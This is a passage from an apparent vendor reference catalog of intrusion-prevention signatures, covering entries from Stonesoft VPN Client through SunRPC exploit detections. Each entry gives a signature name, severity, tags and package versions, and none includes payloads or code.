Tags: Business Apps, Endpoint
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1534-5242
Description: Stonesoft VPN Client endpoint application has been detected.
Back to top

Storage-Pipe-Fastback-DR

About this situation: Application Storage-Pipe-Fastback-DR detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Storagepipe Fastback DR is the ultimate online backup solution for Windows servers. Provides a feature set for backing up and recovering Data Files, Exchange Servers and SQL Databases and it also offers the fastest recovery speeds.
Back to top

Store-Guardian

About this situation: Application Store-Guardian detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Storage Guardian - offers secure data backup and data storage solution as a superior alternative to tape-based data recovery systems.
Back to top

Storefront-Social

About this situation: Application Storefront-Social detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Storefront Social allow set up a Facebook Store. Add your Facebook Shop to your Facebook Business Page in minutes.
Back to top

Storegate

About this situation: Application Storegate detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Storegate is secure cloud with online backup for mobile phones, computers and servers.
Back to top

Storenvy

About this situation: Application Storenvy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Storenvy provides an e-commerce network enabling users to shop across stores.
Back to top

StoreYa

About this situation: Application StoreYa detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: StoreYa allow import your web store to Facebook automatically and launch social markeing campaigns on Facebook, website, blog and mobile.
Back to top

Storify

About this situation: Application Storify detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Storify is a social network service that lets the user create stories or timelines using social media such as Twitter, Facebook and Instagram.
Back to top

Storj

About this situation: Application Storj detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Storj is a secure, autonomous, blockchain based, decentralized storage.
Back to top

Storm-Cloud-Servers

About this situation: Application Storm-Cloud-Servers detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Storm on Demand is a cloud computing and virtual server hosting infrastructure developed by Liquid Web Inc, making it quick and easy to deploy and manage cloud servers.
Back to top

StoryBird

About this situation: Application StoryBird detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: StoryBird library of books, picture books and poetry or use simple tools to create books in minutes. Storybird is a creative community where readers and writers celebrate storytelling.
Back to top

STRATO

About this situation: Application STRATO detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Strato AG is an internet service provider.
Back to top

Stratum

About this situation: Stratum usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-649-5211
Last changed: sgpkg-ips-759-5211
Description: Stratum Mining Protocol is a communication protocol used to organize cryptographic currency miners over Internet. The semantics is based on JSON-RPC.
Back to top

Strava

About this situation: Strava usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Health, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-773-5211
Description: Strava is web-based service for tracking athletic activity via GPS.
Back to top

Streamaudio

About this situation: StreamAudio usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A streaming audio service for online radio stations
Back to top

Streambox

About this situation: Streambox usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: The platform comprises clients - from small form factor mobile devices and laptops - to rule-based video management and playout systems. The scalable end-to-end Streambox solutions can be integrated into all IP centric broadcast and broadband operations.
Back to top

Streaming Media

About this situation: Sites that enable streaming of media content.
Context: URL Application Context
Severity: 1
Tags: Bandwidth, Network Bandwidth Loss, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that enable streaming of media content.
Back to top

Streamliner-BPM

About this situation: Application Streamliner-BPM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Invest4all is a technical commercial group, specialized in administrative, archival and financial system for private and public agencies.A flexible cross platform web based BPM enables you to automate and track your business processes.
Back to top

StreamNation

About this situation: Application StreamNation detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: StreamNation is the ultimate media storage service for your movies, TV shows, personal photos and videos. Allow stream your content everywhere.
Back to top

Streamsend

About this situation: StreamSend usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Mail, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1764-5242
Description: This service provides permission-based email marketing solutions.
Back to top

Stream_blocking_late

About this situation: Blocking stream bytes too late
Context: TCP without parameters
Severity: 8
Tags: Potential Compromise
First detected in: sgpkg-ips-674-5211
Last changed: sgpkg-ips-674-5211
Description: An attempt to block connection stream bytes (possibly to modify or remove them) was late and some of the bytes were sent already.
Back to top

Street-Invoice

About this situation: Application Street-Invoice detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Invoice your customers, manage your business and make sure you get paid. Quickly sends professional invoices to your customer from any device.
Back to top

Streetmetrics

About this situation: Streetmetrics usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Marketing, Application Routing
First detected in: sgpkg-ips-1769-5242
Last changed: sgpkg-ips-1769-5242
Description: StreetMetrics provides out-of-home media operators moving and stationary ad planning, measurement, & attribution solutions.
Back to top

StreetSmart-Workflow-Management

About this situation: Application StreetSmart-Workflow-Management detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: StreetSmart helps you monitor projects, tasks, share important documents online, schedule deadlines.
Back to top

StrikeBase

About this situation: Application StrikeBase detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: StrikeBase is an Online work platform for collaboration and Project management in one central place with tasks, time-tracking, web and desktop chat, file sharing, ToDo checklists, activity streams with comments and more.
Back to top

StrikeIron

About this situation: Application StrikeIron detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: StrikeIron provide email verification and hygiene, address verification, phone validation, phone append, SMS text messaging, and sales tax solutions to organizations in a variety of markets.
Back to top

Strongspace

About this situation: Application Strongspace detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Strongspace continuously backs up your data and the changes you make to it. Make online backup. Strongspace captures full snapshots of your data every hour and thinning out to daily weekly snapshots - freezing a consistent image of all the files and folders at that moment.
Back to top

StructuredWeb

About this situation: Application StructuredWeb detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: StructuredWeb is a provider of Channel Marketing technologies and services for companies that drive demand through channel partner and reseller networks.
Back to top

Study-Island

About this situation: Application Study-Island detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Study Island is a leading academic software provider of standards-based assessment, instruction, and test preparation e-learning programs.
Back to top

StudyBackup

About this situation: Application StudyBackup detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Study Backup was created to provide a complete online backup solution for personal users
Back to top

StumbleUpon

About this situation: StumbleUpon usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-1128-5242
Description: StumbleUpon is a web discovery engine that finds and recommends web content to its users.
Back to top

STUN

About this situation: STUN traffic
Context: Application Context
Severity: 1
Tags: Protocols, Media
First detected in: sgpkg-ips-1145-5242
Last changed: sgpkg-ips-1145-5242
Description: STUN protocol usage detected. STUN protocol is often used by real-time voice, video, messaging, and other interactive communication applications.
Back to top

Stupeflix-Studio

About this situation: Application Stupeflix-Studio detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Stupeflix Studio is a video making software.
Back to top

Style-Jukebox

About this situation: Application Style-Jukebox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Style Jukebox is Hi-Fi Cloud Music Player that lets you take your music anywhere and listen to it on all your devices, online and offline.
Back to top

Stytch

About this situation: Application Stytch detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Stytch is an end-to-end data analytics platform that provides the fastest way to prepare, explore and share your data to get the most business insights.
Back to top

SubscriberMail

About this situation: Application SubscriberMail detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SubscriberMail is email marketing service provider, offering sophisticated tools to develop and deliver professional email communications.
Back to top

subsituation 2228225

About this situation:
Context: EI Version Stream
Severity: 1
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1861-5242
Description:
Back to top

subsituation 2228226

About this situation:
Context: EI Version Stream
Severity: 1
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1864-5242
Description:
Back to top

subsituation 2228227

About this situation:
Context: EI Version Stream
Severity: 1
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

subsituation 2228228

About this situation:
Context: EI Version Stream
Severity: 1
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1873-5242
Description:
Back to top

subsituation 2228229

About this situation:
Context: EI Version Stream
Severity: 1
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1861-5242
Description:
Back to top

subsituation 2228230

About this situation:
Context: EI Version Stream
Severity: 1
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1864-5242
Description:
Back to top

subsituation 2228231

About this situation:
Context: EI Version Stream
Severity: 1
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

subsituation 2228232

About this situation:
Context: EI Version Stream
Severity: 1
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

subsituation 2228233

About this situation:
Context: EI Version Stream
Severity: 1
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

subsituation 2228234

About this situation:
Context: EI Version Stream
Severity: 1
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

subsituation 2228235

About this situation:
Context: EI Version Stream
Severity: 1
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

subsituation 2228236

About this situation:
Context: EI Version Stream
Severity: 1
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

subsituation 2228237

About this situation:
Context: EI Version Stream
Severity: 1
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1873-5242
Description:
Back to top

subsituation 2228238

About this situation:
Context: EI Version Stream
Severity: 1
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

subsituation 2228239

About this situation:
Context: EI Version Stream
Severity: 1
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

subsituation 2228240

About this situation:
Context: EI Version Stream
Severity: 1
First detected in: sgpkg-ips-989-5242
Last changed: sgpkg-ips-989-5242
Description:
Back to top

subsituation 2228241

About this situation:
Context: EI Version Stream
Severity: 1
First detected in: sgpkg-ips-989-5242
Last changed: sgpkg-ips-989-5242
Description:
Back to top

subsituation 2228242

About this situation:
Context: EI Version Stream
Severity: 1
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Description:
Back to top

subsituation 2228243

About this situation:
Context: EI Version Stream
Severity: 1
First detected in: sgpkg-ips-1117-5242
Last changed: sgpkg-ips-1754-5242
Description:
Back to top

subsituation 2949121

About this situation:
Context: ECA OS Name
Severity: 1
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

subsituation 2949122

About this situation:
Context: ECA OS Name
Severity: 1
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1411-5242
Description:
Back to top

subsituation 2949123

About this situation:
Context: ECA OS Name
Severity: 1
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-990-5242
Description:
Back to top

subsituation 2949124

About this situation:
Context: ECA OS Name
Severity: 1
First detected in: sgpkg-ips-990-5242
Last changed: sgpkg-ips-990-5242
Description:
Back to top

subsituation 2949125

About this situation:
Context: ECA OS Name
Severity: 1
First detected in: sgpkg-ips-1411-5242
Last changed: sgpkg-ips-1411-5242
Description:
Back to top

subsituation 2949126

About this situation:
Context: ECA OS Name
Severity: 1
First detected in: sgpkg-ips-1411-5242
Last changed: sgpkg-ips-1411-5242
Description:
Back to top

subsituation 2949127

About this situation:
Context: ECA OS Name
Severity: 1
First detected in: sgpkg-ips-1411-5242
Last changed: sgpkg-ips-1411-5242
Description:
Back to top

subsituation 2949128

About this situation:
Context: ECA OS Name
Severity: 1
First detected in: sgpkg-ips-1411-5242
Last changed: sgpkg-ips-1411-5242
Description:
Back to top

subsituation 3014657

About this situation:
Context: ECA OS Extra Information
Severity: 1
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

subsituation 3014660

About this situation:
Context: ECA OS Extra Information
Severity: 1
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

subsituation 499467

About this situation:
Context: Text File Stream
Severity: 1
First detected in: sgpkg-ips-1117-5242
Last changed: sgpkg-ips-1117-5242
Description:
Back to top

subsituation 499638

About this situation:
Context: Text File Stream
Severity: 1
First detected in: sgpkg-ips-913-5242
Last changed: sgpkg-ips-913-5242
Description:
Back to top

Subversion-HTTP

About this situation: Usage of Subversion over HTTP detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-427-4219
Last changed: sgpkg-ips-628-5211
Description: Subversion is an open-source revision control system.
Back to top

Subversion-SVN

About this situation: Subversion SVN protocol traffic
Context: Application Context
Severity: 1
Tags: Protocols, File Sharing, Application Routing
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1678-5242
Description: SVN is a software versioning and revision control system.
Back to top

SuccessFactors

About this situation: SuccessFactors usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-576-5211
Last changed: sgpkg-ips-628-5211
Description: SuccssFactors is a cloud-based human resources management service.
Back to top

SuccessNet+

About this situation: Application SuccessNet+ detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pearson SuccessNet is a system for learning for teachers and students who are studying at home. It gives students access to online textbooks as well as other study materials. There are also online tests.
Back to top

Sueddeutsche-Zeitung

About this situation: SZ.de usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-709-5211
Last changed: sgpkg-ips-709-5211
Description: Sueddeutsche Zeitung is a German daily newspaper.
Back to top

SugarCRM

About this situation: SugarCRM usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: An open-source customer relationship management system; source Wikipedia
Back to top

SugarForce

About this situation: Application SugarForce detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sourceforge customer relationship management software company. SugarForge is the prime destination for SugarCRM users to collaborate and extend Sugar Open Source.
Back to top

Sugarsync

About this situation: SugarSync usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: SugarSync is a cloud service that enables active synchronization of files across computers and other devices for file backup, access, syncing and sharing from a variety of operating systems, such as Windows, Mac OS X, iOS, Android, Windows Mobile, Samsung SmartTV, BlackBerry OS, and Symbian devices. There is no Linux version available.
Back to top

Sulake

About this situation: Sulake usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based social online service which allows users to find social places and games.
Back to top

SumatraPDF

About this situation: Endpoint Context Agent based SumatraPDF detection
Context: EI Correlation
Severity: 1
Tags: Productivity, Endpoint
First detected in: sgpkg-ips-1183-5242
Last changed: sgpkg-ips-1183-5242
Description: SumatraPDF endpoint application has been detected. SumatraPDF is a free, open-source PDF reader for Windows.
Back to top

Sumo-Logic

About this situation: Sumo Logic usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-699-5211
Last changed: sgpkg-ips-1764-5242
Description: Sumo Logic is a cloud-based real-time analysis tool.
Back to top

SumoPaint

About this situation: Application SumoPaint detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SumoPaint is a cloud based creative app for painting.
Back to top

SumTotal-Systems

About this situation: Application SumTotal-Systems detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SumTotal Systems provides human resource management software and services to private and public sector organizations.
Back to top

SunGard

About this situation: Application SunGard detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SunGard is a browser-based application that automates compliance with personal trading regulations.
Back to top

SunRPC_CS-CA-Arcserve-Backup-Authentication-Invalid-Virtual-Function-Call

About this situation: An attempt to exploit a vulnerability in CA ARCserve Backup (For Windows) detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Computer Associates BrightStor ARCserve Backup, CVE2012, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-490-5211
Last changed: sgpkg-ips-490-5211
Vulnerability: CA-Arcserve-Backup-Authentication-Service-Invalid-Virtual-Function-Call
Description:
Back to top

SunRPC_CS-EMC-NetWorker-Nsrindexd-RPC-Service-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in EMC NetWorker detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, EMC Legato NetWorker, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-506-5211
Last changed: sgpkg-ips-506-5211
Vulnerability: EMC-NetWorker-Nsrindexd-RPC-Service-Buffer-Overflow
Description:
Back to top

SunRPC_CS-EMC-NetWorker-Nsrindexd.exe-Procedure-0x01-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in EMC NetWorker detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, EMC Legato NetWorker, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-442-4219
Last changed: sgpkg-ips-442-4219
Vulnerability: EMC-NetWorker-Nsrindexd.exe-Procedure-0x01-Buffer-Overflow
Description:
Back to top

SunRPC_CS-Linux-Kernel-Nfsd-Cap_Mknod-Security-Bypass

About this situation: An attempt to exploit a vulnerability in Linux Kernel Project Linux detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Linux, Any Hardware, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Linux-Kernel-Nfsd-Cap_Mknod-Security-Bypass
Description:
Back to top

SunRPC_CS-Linux-Kernel-Nfsv4-Nfsd-Pnfs-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Linux Kernel Project Kernel detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Linux, Any Hardware, CVE2017, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-990-5242
Last changed: sgpkg-ips-990-5242
Vulnerability: Linux-Kernel-Nfsv4-Nfsd-Pnfs-Denial-Of-Service
Description:
Back to top

SunRPC_CS-Sun-Solaris-sadmind-RPC-Request-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Sun Microsystems Solaris detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Solaris, Any Hardware, CVE2008, Solaris not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-389-4219
Last changed: sgpkg-ips-389-4219
Vulnerability: Sun-Solaris-sadmind-RPC-Request-Buffer-Overflow
Description:
Back to top

SunRPC_MIT-Kerberos-Kadmind-Rename-Principal-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in MIT Kerberos detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MIT Kerberos, CVE2007, Any Operating System not specific, MIT Kerberos not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: MIT-Kerberos-Kadmind-Rename-Principal-Buffer-Overflow
Description:
Back to top

SunRPC_Nfs-Export-Query

About this situation: Detected showmount export query
Context: TCP Client Stream Unknown
Severity: 2
Tags: Unix, Any Hardware, Unix not specific, Potential Probe, TCP Client Traffic
First detected in: sgpkg-ips-352-4219
Last changed: sgpkg-ips-352-4219
Vulnerability: RPC-Portmapper-Access
Description:
Back to top

SunRPC_Portmap-GetPort-Query

About this situation: Detected portmap getport query
Context: TCP Client Stream Unknown
Severity: 2
Tags: Unix, Any Hardware, Unix not specific, Potential Probe, TCP Client Traffic
First detected in: sgpkg-ips-791-5211
Last changed: sgpkg-ips-791-5211
Vulnerability: RPC-Portmapper-Access
Description:
Back to top

SunRPC_RPC-Portmapper-Dump-Query

About this situation: Detected portmapper dump query
Context: TCP Client Stream Unknown
Severity: 2
Tags: Unix, Any Hardware, Unix not specific, Potential Probe, TCP Client Traffic
First detected in: sgpkg-ips-320-4219
Last changed: sgpkg-ips-324-4219
Vulnerability: RPC-Portmapper-Access
Description:
Back to top

SunRPC_SnmpXdmid-Detected

About this situation: Acccess to snmpxdmid-detected
Context: TCP Client Stream Unknown
Severity: 1
Tags: Solaris, Any Hardware, snmpXdmid, CVE2001, Solaris not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-370-4219
Last changed: sgpkg-ips-370-4219
Vulnerability: Solaris-SnmpXdmid-Malformed-DMI-Request-BOF
Description:
Back to top

SunRPC_TCP-CA-BrightStor-Arcserve-Backup-Caloggerd-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in CA ARCserve Backup detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Computer Associates BrightStor ARCserve Backup, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-435-4219
Vulnerability: CA-BrightStor-Arcserve-Backup-Caloggerd-Opcode-79-Stack-Buffer-Overflow
Description:
Back to top

SunRPC_TCP-CA-BrightStor-Arcserve-Backup-Caloggerd.exe-Null-Hostname-DOS

About this situation: Denial of service exploit against the Computer Associates BrightStor ARCserve Backup caloggerd process detected
Context: TCP Client Stream Unknown
Severity: 2
Tags: Windows, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, CVE2007, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-324-4219
Last changed: sgpkg-ips-324-4219
Vulnerability: RPC-CA-BrightStor-Arcserve-Backup-Caloggerd.exe-Null-Hostname-DOS
Description:
Back to top

SunRPC_TCP-CA-BrightStor-Arcserve-Backup-Media-Server-Sun-RPC-Denial-Of-Service

About this situation: Denial of service exploit against Computer Associates BrightStor ARCserve Media Server detected
Context: TCP Client Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, CVE2007, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-324-4219
Last changed: sgpkg-ips-324-4219
Vulnerability: RPC-CA-BrightStor-Arcserve-Backup-Media-Server-Sun-RPC-Denial-Of-Service
Description:
Back to top

SunRPC_TCP-CA-BrightStor-Arcserve-Backup-Media-Server-Sun-RPC-Service-BOF

About this situation: Buffer overflow exploit against Computer Associates BrightStor ARCserve Media Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, CVE2007, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-324-4219
Last changed: sgpkg-ips-324-4219
Vulnerability: RPC-CA-BrightStor-Arcserve-Backup-Media-Server-Sun-RPC-Service-BOF
Description:
Back to top

SunRPC_TCP-CA-BrightStor-Arcserve-Backup-Media-Server-SunRPC-Vulnerability

About this situation: Detects SunRPC requests that exploit a code execution vulnerability in CA BrightStor media server
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, x86, Computer Associates BrightStor, CVE2007, Windows not specific, Computer Associates BrightStor not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-324-4219
Last changed: sgpkg-ips-437-4219
Vulnerability: CA-BrightStor-Arcserve-Backup-Media-Server-SunRPC-Code-Execution-Vulnerability
Description:
Back to top

SunRPC_TCP-CA-BrightStor-Arcserve-Backup-Xdr-Parsing-Buffer-Overflow

About this situation: Attempt to exploit a buffer overflow vulnerability in Computer Associates BrightStor ARCserve Backup detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Computer Associates Business Protection Suite 2, Computer Associates Server Protection Suite 2, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, CVE2008, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-324-4219
Last changed: sgpkg-ips-324-4219
Vulnerability: CA-BrightStor-Arcserve-Backup-Xdr-Parsing-Buffer-Overflow
Description:
Back to top

SunRPC_TCP-EMC-Legato-NetWorker-Remote-Exec-Service-Buffer-Overflow

About this situation: Buffer overflow exploit against EMC legato NetWorker detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, EMC Legato NetWorker, CVE2007, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-324-4219
Last changed: sgpkg-ips-324-4219
Vulnerability: RPC-EMC-Legato-NetWorker-Remote-Exec-Service-Buffer-Overflow
Description:
Back to top

SunRPC_TCP-EMC-NetWorker-Nsrd-Format-String-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in EMC NetWorker detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, EMC Legato NetWorker, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-478-5211
Last changed: sgpkg-ips-478-5211
